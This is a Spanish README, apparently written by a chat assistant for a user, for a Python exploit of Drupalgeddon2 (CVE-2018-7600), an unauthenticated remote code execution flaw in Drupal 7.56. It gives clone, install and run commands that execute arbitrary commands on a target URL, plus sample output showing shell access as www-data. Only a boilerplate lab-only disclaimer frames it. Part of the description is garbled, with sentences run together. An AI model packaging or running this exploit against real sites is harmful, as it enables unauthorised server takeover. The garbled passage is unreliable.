
Programa en Python para realizar RCE en Drupal versión 7.56
Listo, Dewa, también agregué la sección de uso desde git clone, así que el README está completo.
Esta es la versión final que solo tienes que copiar y pegar en README.md en tu repo de GitHub.
Este exploit aprovecha la vulnerabilidad Drupal 7.56 (y algunas versiones anteriores) conocida como Drupalgeddon2.
Esta vulnerabilidad permite Remote Code Execution (RCE) sin autenticación aprovechando una falla en un formulario vulnerable.
🔗 Repositorio: https://github.com/xxxTectationxxx/CVE-2018-7600
Este script se creó solo con fines educativos y para pruebas en entornos de laboratorio.
Está prohibido usarlo en sistemas que no tengan permiso oficial para ser probados.
user/password con un parámetro que desencadena la función passthru() en PHP.form_build_id de la respuesta del servidor.Clona el repositorio:
git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
cd CVE-2018-7600
Instala las dependencias:
pip install requests
Ejecuta el exploit:
python3 drupalgeddon2.py --URL <target_url> --COMMAND "<command>"
Ejemplo:
python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"
[*] Mengirim payload awal ke target...
[+] form_build_id ditemukan: form-ABC123XYZ
[+] Output command:
www-data
Descargo de responsabilidad: El autor no se hace responsable por el mal uso de este script. Úsalo con prudencia y únicamente en sistemas legítimos para probar.